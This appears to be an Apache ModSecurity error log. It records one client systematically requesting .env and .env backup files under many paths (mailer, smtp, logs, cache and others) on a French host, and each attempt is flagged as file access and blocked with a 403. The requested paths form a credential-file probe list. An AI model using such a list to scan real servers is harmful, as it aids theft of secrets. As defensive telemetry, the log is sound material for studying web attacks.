[Mon May 11 15:50:17.453685 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agHemat2WtvoFr7xvGzc5gAAAIk"]
[Mon May 11 15:50:17.454113 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agHemat2WtvoFr7xvGzc5gAAAIk"]
[Mon May 11 15:50:17.454338 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agHemat2WtvoFr7xvGzc5gAAAIk"]
[Mon May 11 15:50:17.545997 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agHemat2WtvoFr7xvGzc5wAAAIk"]
[Mon May 11 15:50:17.546461 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agHemat2WtvoFr7xvGzc5wAAAIk"]
[Mon May 11 15:50:17.546690 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agHemat2WtvoFr7xvGzc5wAAAIk"]
[Mon May 11 15:50:17.638505 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agHemat2WtvoFr7xvGzc6AAAAIk"]
[Mon May 11 15:50:17.638991 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agHemat2WtvoFr7xvGzc6AAAAIk"]
[Mon May 11 15:50:17.639234 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/sitemaps/.env"] [unique_id "agHemat2WtvoFr7xvGzc6AAAAIk"]
[Mon May 11 15:50:17.730856 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agHemat2WtvoFr7xvGzc6QAAAIk"]
[Mon May 11 15:50:17.731333 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agHemat2WtvoFr7xvGzc6QAAAIk"]
[Mon May 11 15:50:17.731559 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup1"] [unique_id "agHemat2WtvoFr7xvGzc6QAAAIk"]
[Mon May 11 15:50:17.830889 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agHemat2WtvoFr7xvGzc6wAAAIk"]
[Mon May 11 15:50:17.831448 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agHemat2WtvoFr7xvGzc6wAAAIk"]
[Mon May 11 15:50:17.831708 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup2"] [unique_id "agHemat2WtvoFr7xvGzc6wAAAIk"]
[Mon May 11 15:50:17.925273 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agHemat2WtvoFr7xvGzc7AAAAIk"]
[Mon May 11 15:50:17.925624 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agHemat2WtvoFr7xvGzc7AAAAIk"]
[Mon May 11 15:50:17.925816 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/logs/.env"] [unique_id "agHemat2WtvoFr7xvGzc7AAAAIk"]
[Mon May 11 15:50:18.017657 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agHemqt2WtvoFr7xvGzc7QAAAIk"]
[Mon May 11 15:50:18.018045 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agHemqt2WtvoFr7xvGzc7QAAAIk"]
[Mon May 11 15:50:18.018261 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cache/.env"] [unique_id "agHemqt2WtvoFr7xvGzc7QAAAIk"]
[Mon May 11 15:50:18.111149 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agHemqt2WtvoFr7xvGzc7wAAAIk"]
[Mon May 11 15:50:18.111617 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agHemqt2WtvoFr7xvGzc7wAAAIk"]
[Mon May 11 15:50:18.111856 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailer/.env"] [unique_id "agHemqt2WtvoFr7xvGzc7wAAAIk"]
[Mon May 11 15:50:18.203765 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8AAAAIk"]
[Mon May 11 15:50:18.204144 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8AAAAIk"]
[Mon May 11 15:50:18.204355 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mail/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8AAAAIk"]
[Mon May 11 15:50:18.295684 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8QAAAIk"]
[Mon May 11 15:50:18.296050 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8QAAAIk"]
[Mon May 11 15:50:18.296265 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/email/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8QAAAIk"]
[Mon May 11 15:50:18.388871 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8gAAAIk"]
[Mon May 11 15:50:18.389255 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8gAAAIk"]
[Mon May 11 15:50:18.389457 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/smtp/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8gAAAIk"]
[Mon May 11 15:50:18.485913 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8wAAAIk"]
[Mon May 11 15:50:18.486297 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8wAAAIk"]
[Mon May 11 15:50:18.486491 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mailing/.env"] [unique_id "agHemqt2WtvoFr7xvGzc8wAAAIk"]
[Mon May 11 15:50:18.577845 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9AAAAIk"]
[Mon May 11 15:50:18.578233 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9AAAAIk"]
[Mon May 11 15:50:18.578436 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/notifications/.env"] [unique_id "agHemqt2WtvoFr7xvGzc9AAAAIk"]
